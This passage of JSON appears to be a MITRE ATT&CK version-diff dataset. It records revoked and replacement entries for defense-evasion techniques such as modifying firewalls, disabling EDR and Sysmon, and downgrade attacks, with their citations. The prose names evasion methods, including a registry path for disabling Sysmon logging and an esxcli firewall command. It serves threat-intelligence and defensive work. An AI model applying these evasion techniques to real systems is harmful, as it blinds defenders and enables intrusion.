                            "description": "InTheCyber. (2025, March 24). Exposed Fortinet Fortigate firewall interface leads to LockBit Ransomware (CVE-2024\u201355591). Retrieved September 22, 2025.",
                            "url": "https://posts.inthecyber.com/exposed-fortinet-fortigate-firewall-interface-leads-to-lockbit-ransomware-cve-2024-55591-8f4b7a244041"
                        },
                        {
                            "source_name": "CVE-2024-55591 Detail",
                            "description": "NIST NVD. (2025, January 22). Retrieved September 22, 2025.",
                            "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-55591"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Marco Pedrinazzi, @pedrinazziM, InTheCyber",
                        "Tommaso Tosi, @tosto92, InTheCyber"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Network Devices"
                    ],
                    "x_mitre_version": "1.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-14 22:54:47.142000+00:00\", \"old_value\": \"2025-10-22 00:01:58.079000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['revoked']\": {\"new_value\": true, \"old_value\": false}, \"root['external_references'][1]['url']\": {\"new_value\": \"https://posts.inthecyber.com/exposed-fortinet-fortigate-firewall-interface-leads-to-lockbit-ransomware-cve-2024-55591-8f4b7a244041\", \"old_value\": \"https://posts.inthecyber.com/exposed-fortinet-fortigate-firewall-interface-leads-to-lockbit-ransomware-cve-2024-55591-de8fcfb6c45c\"}}}",
                    "revoked_by": {
                        "type": "attack-pattern",
                        "id": "attack-pattern--a29aa77c-a88d-4f19-bab9-7751941b2e2d",
                        "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "created": "2026-04-14 22:54:05.016000+00:00",
                        "modified": "2026-04-22 15:38:51.612000+00:00",
                        "name": "Network Device Firewall",
                        "description": "Adversaries may disable network device-based firewall mechanisms entirely or add, delete, or modify particular rules in order to bypass controls limiting network usage.  \n\nAdversaries may obtain access to devices such as routers, switches, or other perimeter/network devices and change access control lists (ACLs), security zones, or policy rules to permit otherwise blocked traffic. For example, adversaries may add new network firewall rules to allow access to all internal network subnets without restrictions. Allowing access to internal network subsets may enable unrestricted inbound/outbound connectivity or open paths for command and control and lateral movement.\n\nAdversaries may obtain access to network device management interfaces via [Valid Accounts](https://attack.mitre.org/techniques/T1078) or by exploiting vulnerabilities. In some cases, threat actors may target firewalls and other network infrastructure that are exposed to the internet by leveraging weaknesses in public-facing applications ([Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).(Citation: CVE-2024-55591 Detail)\n\nAdversaries may also modify host networking configurations that indirectly manipulate system firewalls, such as adjusting interface bandwidth or network connection request thresholds. ",
                        "kill_chain_phases": [
                            {
                                "kill_chain_name": "mitre-attack",
                                "phase_name": "defense-impairment"
                            }
                        ],
                        "revoked": false,
                        "external_references": [
                            {
                                "source_name": "mitre-attack",
                                "url": "https://attack.mitre.org/techniques/T1686/002",
                                "external_id": "T1686.002"
                            },
                            {
                                "source_name": "CVE-2024-55591 Detail",
                                "description": "NIST NVD. (2025, January 22). Retrieved September 22, 2025.",
                                "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-55591"
                            }
                        ],
                        "object_marking_refs": [
                            "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                        ],
                        "x_mitre_attack_spec_version": "3.3.0",
                        "x_mitre_contributors": [
                            "Marco Pedrinazzi, @pedrinazziM, InTheCyber",
                            "Tommaso Tosi, @tosto92, InTheCyber"
                        ],
                        "x_mitre_deprecated": false,
                        "x_mitre_domains": [
                            "enterprise-attack"
                        ],
                        "x_mitre_is_subtechnique": true,
                        "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "x_mitre_platforms": [
                            "Network Devices"
                        ],
                        "x_mitre_version": "1.0"
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--5372c5fe-f424-4def-bcd5-d3a8e770f07b",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-02-21 21:00:48.814000+00:00",
                    "modified": "2026-04-14 22:54:32.535000+00:00",
                    "name": "Disable or Modify System Firewall",
                    "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.\n\nModifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port (i.e. [Non-Standard Port](https://attack.mitre.org/techniques/T1571)).(Citation: change_rdp_port_conti)\n\nAdversaries may also modify host networking settings that indirectly manipulate system firewalls, such as interface bandwidth or network connection request thresholds.(Citation: Huntress BlackCat) Settings related to enabling abuse of various [Remote Services](https://attack.mitre.org/techniques/T1021) may also indirectly modify firewall rules.\n\nIn ESXi, firewall rules may be modified directly via the esxcli command line interface (e.g., via `esxcli network firewall set`) or via the vCenter user interface.(Citation: Trellix Rnasomhouse 2024)(Citation: Broadcom ESXi Firewall)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": true,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1562/004",
                            "external_id": "T1562.004"
                        },
                        {
                            "source_name": "Broadcom ESXi Firewall",
                            "description": "Broadcom. (2025, March 24). Add Allowed IP Addresses for an ESXi Host by Using the VMware Host Client. Retrieved March 26, 2025.",
                            "url": "https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere/7-0/add-allowed-ip-addresses-for-an-esxi-host-by-using-the-vmware-host-client.html"
                        },
                        {
                            "source_name": "Huntress BlackCat",
                            "description": "Carvey, H. (2024, February 28). BlackCat Ransomware Affiliate TTPs. Retrieved March 27, 2024.",
                            "url": "https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps"
                        },
                        {
                            "source_name": "Trellix Rnasomhouse 2024",
                            "description": "Pham Duy Phuc, Max Kersten, No\u00ebl Keijzer, and Micha\u00ebl Schrijver. (2024, February 14). RansomHouse am See. Retrieved March 26, 2025.",
                            "url": "https://www.trellix.com/en-au/blogs/research/ransomhouse-am-see/"
                        },
                        {
                            "source_name": "change_rdp_port_conti",
                            "description": "The DFIR Report. (2022, March 1). \"Change RDP port\" #ContiLeaks. Retrieved September 12, 2024.",
                            "url": "https://x.com/TheDFIRReport/status/1498657772254240768"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.2.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "ESXi",
                        "Linux",
                        "macOS",
                        "Network Devices",
                        "Windows"
                    ],
                    "x_mitre_version": "1.3",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-14 22:54:32.535000+00:00\", \"old_value\": \"2025-10-24 17:48:47.755000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['revoked']\": {\"new_value\": true, \"old_value\": false}}}",
                    "revoked_by": {
                        "type": "attack-pattern",
                        "id": "attack-pattern--eec096b8-c207-43df-b6c1-11523861e452",
                        "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "created": "2026-04-14 22:53:27.275000+00:00",
                        "modified": "2026-04-22 15:36:31.474000+00:00",
                        "name": "Disable or Modify System Firewall",
                        "description": "Adversaries may disable or modify host-based or network firewalls to impair defensive mechanisms and enable further action. Once an adversary has gathered sufficient privileges, they can tamper with firewall services, policies, or rule sets to remove restrictions on inbound or outbound traffic. For example, this may include turning off firewall profiles, altering existing rules to permit previously blocked ports or protocols, or adding new rules that create covert communication paths (e.g., adding a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port.(Citation: change_rdp_port_conti)\n\nAdversaries may disable or modify firewalls using different behaviors, depending on the platform. For example, in ESXi, firewall rules may be modified directly via the esxcli (e.g., via esxcli network firewall set) or via the vCenter user interface.(Citation: Broadcom ESXi Firewall)(Citation: Trellix Rnasomhouse 2024)",
                        "kill_chain_phases": [
                            {
                                "kill_chain_name": "mitre-attack",
                                "phase_name": "defense-impairment"
                            }
                        ],
                        "revoked": false,
                        "external_references": [
                            {
                                "source_name": "mitre-attack",
                                "url": "https://attack.mitre.org/techniques/T1686",
                                "external_id": "T1686"
                            },
                            {
                                "source_name": "Broadcom ESXi Firewall",
                                "description": "Broadcom. (2025, March 24). Add Allowed IP Addresses for an ESXi Host by Using the VMware Host Client. Retrieved March 26, 2025.",
                                "url": "https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere/7-0/add-allowed-ip-addresses-for-an-esxi-host-by-using-the-vmware-host-client.html"
                            },
                            {
                                "source_name": "Trellix Rnasomhouse 2024",
                                "description": "Pham Duy Phuc, Max Kersten, No\u00ebl Keijzer, and Micha\u00ebl Schrijver. (2024, February 14). RansomHouse am See. Retrieved March 26, 2025.",
                                "url": "https://www.trellix.com/en-au/blogs/research/ransomhouse-am-see/"
                            },
                            {
                                "source_name": "change_rdp_port_conti",
                                "description": "The DFIR Report. (2022, March 1). \"Change RDP port\" #ContiLeaks. Retrieved September 12, 2024.",
                                "url": "https://x.com/TheDFIRReport/status/1498657772254240768"
                            }
                        ],
                        "object_marking_refs": [
                            "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                        ],
                        "x_mitre_attack_spec_version": "3.3.0",
                        "x_mitre_deprecated": false,
                        "x_mitre_domains": [
                            "enterprise-attack"
                        ],
                        "x_mitre_is_subtechnique": false,
                        "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "x_mitre_platforms": [
                            "ESXi",
                            "Linux",
                            "macOS",
                            "Network Devices",
                            "Windows"
                        ],
                        "x_mitre_version": "1.0"
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-02-21 20:32:20.810000+00:00",
                    "modified": "2026-04-14 22:54:28.635000+00:00",
                    "name": "Disable or Modify Tools",
                    "description": "Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)\n\nAdversaries may trigger a denial-of-service attack via legitimate system processes. It has been previously observed that the Windows Time Travel Debugging (TTD) monitor driver can be used to initiate a debugging session for a security tool (e.g., an EDR) and render the tool non-functional.  By hooking the debugger into the EDR process, all child processes from the EDR will be automatically suspended. The attacker can terminate any EDR helper processes (unprotected by Windows Protected Process Light) by abusing the Process Explorer driver. In combination this will halt any attempt to restart services and cause the tool to crash.(Citation: Cocomazzi FIN7 Reboot)\n\nAdversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) For example, adversaries may abuse the Windows process mitigation policy to block certain endpoint detection and response (EDR) products from loading their user-mode code via DLLs. By spawning a process with the PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON attribute using API calls like UpdateProcThreadAttribute, adversaries may evade detection by endpoint security solutions that rely on DLLs that are not signed by Microsoft. Alternatively, they may add new directories to an EDR tool\u2019s exclusion list, enabling them to hide malicious files via [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012).(Citation: BlackBerry WhisperGate 2022)(Citation: Google Cloud Threat Intelligence FIN13 2021)\n\nAdversaries may also focus on specific applications such as Sysmon. For example, the \u201cStart\u201d and \u201cEnable\u201d values in <code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Microsoft-Windows-Sysmon-Operational</code> may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging) \n\nOn network devices, adversaries may attempt to skip digital signature verification checks by altering startup configuration files and effectively disabling firmware verification that typically occurs at boot.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)(Citation: Analysis of FG-IR-22-369)\n\nIn cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.\n\nFurthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk)\n\nAdditionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": true,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1562/001",
                            "external_id": "T1562.001"
                        },
                        {
                            "source_name": "Analysis of FG-IR-22-369",
                            "description": " Guillaume Lovet and Alex Kong. (2023, March 9). Analysis of FG-IR-22-369. Retrieved May 15, 2023.",
                            "url": "https://www.fortinet.com/blog/psirt-blogs/fg-ir-22-369-psirt-analysis"
                        },
                        {
                            "source_name": "Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation",
                            "description": "ALEXANDER MARVI, BRAD SLAYBAUGH, DAN EBREO, TUFAIL AHMED, MUHAMMAD UMAIR, TINA JOHNSON. (2023, March 16). Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation. Retrieved May 15, 2023.",
                            "url": "https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem"
                        },
                        {
                            "source_name": "BlackBerry WhisperGate 2022",
                            "description": "BlackBerry Research and Intelligence Team. (2022, February 3). Threat Spotlight: WhisperGate Wiper Wreaks Havoc in Ukraine. Retrieved March 18, 2025.",
                            "url": "https://blogs.blackberry.com/en/2022/02/threat-spotlight-whispergate-wiper-wreaks-havoc-in-ukraine"
                        },
                        {
                            "source_name": "Cocomazzi FIN7 Reboot",
                            "description": "Cocomazzi, Antonio. (2024, July 17). FIN7 Reboot | Cybercrime Gang Enhances Ops with New EDR Bypasses and Automated Attacks. Retrieved September 24, 2025.",
                            "url": "https://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/"
                        },
                        {
                            "source_name": "OutFlank System Calls",
                            "description": "de Plaa, C. (2019, June 19). Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR. Retrieved September 29, 2021.",
                            "url": "https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/"
                        },
                        {
                            "source_name": "disable_win_evt_logging",
                            "description": "Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging. Retrieved April 7, 2022.",
                            "url": "https://ptylu.github.io/content/report/report.html?report=25"
                        },
                        {
                            "source_name": "chasing_avaddon_ransomware",
                            "description": "Hernandez, A. S. Tarter, P. Ocamp, E. J. (2022, January 19). One Source to Rule Them All: Chasing AVADDON Ransomware. Retrieved January 26, 2022.",
                            "url": "https://www.mandiant.com/resources/chasing-avaddon-ransomware"
                        },
                        {
                            "source_name": "doppelpaymer_crowdstrike",
                            "description": "Hurley, S. (2021, December 7). Critical Hit: How DoppelPaymer Hunts and Kills Windows Processes. Retrieved January 26, 2022.",
                            "url": "https://www.crowdstrike.com/blog/how-doppelpaymer-hunts-and-kills-windows-processes/"
                        },
                        {
                            "source_name": "avoslocker_ransomware",
                            "description": "Lakshmanan, R. (2022, May 2). AvosLocker Ransomware Variant Using New Trick to Disable Antivirus Protection. Retrieved May 17, 2022.",
                            "url": "https://thehackernews.com/2022/05/avoslocker-ransomware-variant-using-new.html"
                        },
                        {
                            "source_name": "dharma_ransomware",
                            "description": "Loui, E. Scheuerman, K. et al. (2020, April 16). Targeted Dharma Ransomware Intrusions Exhibit Consistent Techniques. Retrieved January 26, 2022.",
                            "url": "https://www.crowdstrike.com/blog/targeted-dharma-ransomware-intrusions-exhibit-consistent-techniques/"
                        },
                        {
                            "source_name": "MDSec System Calls",
                            "description": "MDSec Research. (2020, December). Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams. Retrieved September 29, 2021.",
                            "url": "https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/"
                        },
                        {
                            "source_name": "SCADAfence_ransomware",
                            "description": "Shaked, O. (2020, January 20). Anatomy of a Targeted Ransomware Attack. Retrieved June 18, 2022.",
                            "url": "https://cdn.logic-control.com/docs/scadafence/Anatomy-Of-A-Targeted-Ransomware-Attack-WP.pdf"
                        },
                        {
                            "source_name": "demystifying_ryuk",
                            "description": "Tran, T. (2020, November 24). Demystifying Ransomware Attacks Against Microsoft Defender Solution. Retrieved January 26, 2022.",
                            "url": "https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/demystifying-ransomware-attacks-against-microsoft-defender/ba-p/1928947"
                        },
                        {
                            "source_name": "Google Cloud Threat Intelligence FIN13 2021",
                            "description": "Van Ta, Jake Nicastro, Rufus Brown, and Nick Richard. (2021, December 7). FIN13: A Cybercriminal Threat Actor Focused on Mexico. Retrieved March 18, 2025.",
                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/fin13-cybercriminal-mexico/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Gordon Long, LegioX/Zoom, asaurusrex",
                        "Ziv Karliner, @ziv_kr, Team Nautilus Aqua Security",
                        "Nathaniel Quist, Palo Alto Networks",
                        "Gal Singer, @galsinger29, Team Nautilus Aqua Security",
                        "Daniel Feichter, @VirtualAllocEx, Infosec Tirol",
                        "Cian Heasley",
                        "Alex Soler, AttackIQ",
                        "Sarathkumar Rajendran, Microsoft Defender365",
                        "Lucas Heiligenstein",
                        "Menachem Goldstein",
                        "Nay Myo Hlaing (Ethan), DBS Bank"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Containers",
                        "IaaS",
                        "Linux",
                        "macOS",
                        "Network Devices",
                        "Windows"
                    ],
                    "x_mitre_version": "1.7",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-14 22:54:28.635000+00:00\", \"old_value\": \"2025-10-24 17:49:13.019000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['revoked']\": {\"new_value\": true, \"old_value\": false}}}",
                    "revoked_by": {
                        "type": "attack-pattern",
                        "id": "attack-pattern--bbde9781-60aa-4b8a-a911-895b0c1b3872",
                        "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "created": "2026-04-14 22:53:26.949000+00:00",
                        "modified": "2026-04-22 15:39:46.202000+00:00",
                        "name": "Disable or Modify Tools",
                        "description": "Adversaries may disable, degrade, or tamper with security tools or applications (e.g., endpoint detection and response (EDR) tools, intrusion detection systems (IDS), antivirus, logging agents, sensors, etc.) to impair or reduce visibility of defensive capabilities. This may include stopping specific services, killing processes, modifying or deleting tool configuration files and Registry keys, or preventing tools from updating. This may also include impairing defenses more broadly by disrupting preventative, detection, and response mechanisms across host, network, and cloud environments.(Citation: SCADAfence_ransomware) \n\nIn addition to directly targeting tools, adversaries may block or manipulate indicators and telemetry used for detection. This includes maliciously disabling or redirecting sensors such as Event Tracing for Windows (ETW), modifying event log configurations (e.g., redirecting Security logs), or interfering with logging pipelines and forwarding mechanisms (e.g., SIEM ingestion).(Citation: Microsoft Lamin Sept 2017)(Citation: ETW Palantir)\n\nMore advanced techniques include leveraging legitimate drivers or debugging mechanisms to render tools non-functional, bypassing anti-tampering protections, and targeting specific defenses such as Sysmon or cloud monitoring agents. Adversaries may also disrupt broader defensive operations, including update mechanisms, logging infrastructure (e.g., syslog), or event aggregation, further degrading an organization\u2019s ability to detect and respond to malicious activity.(Citation: Cocomazzi FIN7 Reboot)",
                        "kill_chain_phases": [
                            {
                                "kill_chain_name": "mitre-attack",
                                "phase_name": "defense-impairment"
                            }
                        ],
                        "revoked": false,
                        "external_references": [
                            {
                                "source_name": "mitre-attack",
                                "url": "https://attack.mitre.org/techniques/T1685",
                                "external_id": "T1685"
                            },
                            {
                                "source_name": "Cocomazzi FIN7 Reboot",
                                "description": "Cocomazzi, Antonio. (2024, July 17). FIN7 Reboot | Cybercrime Gang Enhances Ops with New EDR Bypasses and Automated Attacks. Retrieved September 24, 2025.",
                                "url": "https://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/"
                            },
                            {
                                "source_name": "Microsoft Lamin Sept 2017",
                                "description": "Microsoft. (2009, May 17). Backdoor:Win32/Lamin.A. Retrieved September 6, 2018.",
                                "url": "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Backdoor:Win32/Lamin.A"
                            },
                            {
                                "source_name": "ETW Palantir",
                                "description": "Palantir. (2018, December 24). Tampering with Windows Event Tracing: Background, Offense, and Defense. Retrieved April 15, 2026.",
                                "url": "https://blog.palantir.com/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63"
                            },
                            {
                                "source_name": "SCADAfence_ransomware",
                                "description": "Shaked, O. (2020, January 20). Anatomy of a Targeted Ransomware Attack. Retrieved June 18, 2022.",
                                "url": "https://cdn.logic-control.com/docs/scadafence/Anatomy-Of-A-Targeted-Ransomware-Attack-WP.pdf"
                            }
                        ],
                        "object_marking_refs": [
                            "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                        ],
                        "x_mitre_attack_spec_version": "3.3.0",
                        "x_mitre_contributors": [
                            "Alex Soler, AttackIQ",
                            "Cian Heasley",
                            "Daniel Feichter, @VirtualAllocEx, Infosec Tirol",
                            "Gal Singer, @galsinger29, Team Nautilus Aqua Security",
                            "Gordon Long, LegioX/Zoom, asaurusrex",
                            "Lucas Heiligenstein",
                            "Menachem Goldstein",
                            "Nathaniel Quist, Palo Alto Networks",
                            "Nay Myo Hlaing (Ethan), DBS Bank",
                            "Rob Smith",
                            "Sarathkumar Rajendran, Microsoft Defender365",
                            "Ziv Karliner, @ziv_kr, Team Nautilus Aqua Security"
                        ],
                        "x_mitre_deprecated": false,
                        "x_mitre_domains": [
                            "enterprise-attack"
                        ],
                        "x_mitre_is_subtechnique": false,
                        "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "x_mitre_platforms": [
                            "Containers",
                            "ESXi",
                            "IaaS",
                            "Linux",
                            "macOS",
                            "Network Devices",
                            "Windows"
                        ],
                        "x_mitre_version": "1.0"
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--824add00-99a1-4b15-9a2d-6c5683b7b497",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-08 14:06:28.212000+00:00",
                    "modified": "2026-04-14 22:54:35.297000+00:00",
                    "name": "Downgrade Attack",
                    "description": "Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls. Downgrade attacks typically take advantage of a system\u2019s backward compatibility to force it into less secure modes of operation. \n\nAdversaries may downgrade and use various less-secure versions of features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) or [Network Sniffing](https://attack.mitre.org/techniques/T1040).(Citation: Praetorian TLS Downgrade Attack 2014) For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL), which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018)(Citation: att_def_ps_logging)\n\nAdversaries may similarly target network traffic to downgrade from an encrypted HTTPS connection to an unsecured HTTP connection that exposes network data in clear text.(Citation: Targeted SSL Stripping Attacks Are Real)(Citation: Crowdstrike Downgrade) On Windows systems, adversaries may downgrade the boot manager to a vulnerable version that bypasses Secure Boot, granting the ability to disable various operating system security mechanisms.(Citation: SafeBreach)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": true,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1562/010",
                            "external_id": "T1562.010"
                        },
                        {
                            "source_name": "SafeBreach",
                            "description": "Alon Leviev. (2024, August 7). Windows Downdate: Downgrade Attacks Using Windows Updates. Retrieved January 8, 2025.",
                            "url": "https://www.safebreach.com/blog/downgrade-attacks-using-windows-updates/"
                        },
                        {
                            "source_name": "Crowdstrike Downgrade",
                            "description": "Bart Lenaerts-Bergman. (2023, March 14). WHAT ARE DOWNGRADE ATTACKS?. Retrieved May 24, 2023.",
                            "url": "https://www.crowdstrike.com/cybersecurity-101/attack-types/downgrade-attacks/"
                        },
                        {
                            "source_name": "Targeted SSL Stripping Attacks Are Real",
                            "description": "Check Point. (n.d.). Targeted SSL Stripping Attacks Are Real. Retrieved May 24, 2023.",
                            "url": "https://blog.checkpoint.com/research/targeted-ssl-stripping-attacks-are-real/amp/"
                        },
                        {
                            "source_name": "CrowdStrike BGH Ransomware 2021",
                            "description": "Falcon Complete Team. (2021, May 11). Response When Minutes Matter: Rising Up Against Ransomware. Retrieved October 8, 2021.",
                            "url": "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/"
                        },
                        {
                            "source_name": "att_def_ps_logging",
                            "description": "Hao, M. (2019, February 27). Attack and Defense Around PowerShell Event Logging. Retrieved November 24, 2021.",
                            "url": "https://nsfocusglobal.com/attack-and-defense-around-powershell-event-logging/"
                        },
                        {
                            "source_name": "inv_ps_attacks",
                            "description": "Hastings, M. (2014, July 16). Investigating PowerShell Attacks. Retrieved December 1, 2021.",
                            "url": "https://powershellmagazine.com/2014/07/16/investigating-powershell-attacks/"
                        },
                        {
                            "source_name": "Mandiant BYOL 2018",
                            "description": "Kirk, N. (2018, June 18). Bring Your Own Land (BYOL) \u2013 A Novel Red Teaming Technique. Retrieved October 8, 2021.",
                            "url": "https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique"
                        },
                        {
                            "source_name": "welivesecurity",
                            "description": "Martin Smol\u00e1r. (2023, March 1). BlackLotus UEFI bootkit: Myth confirmed. Retrieved February 11, 2025.",
                            "url": "https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/"
                        },
                        {
                            "source_name": "Microsoft Security",
                            "description": "Microsoft Incident Response. (2023, April 11). Guidance for investigating attacks using CVE-2022-21894: The BlackLotus campaign. Retrieved February 12, 2025.",
                            "url": "https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/"
                        },
                        {
                            "source_name": "Praetorian TLS Downgrade Attack 2014",
                            "description": "Praetorian. (2014, August 19). Man-in-the-Middle TLS Protocol Downgrade Attack. Retrieved October 8, 2021.",
                            "url": "https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.2.0",
                    "x_mitre_contributors": [
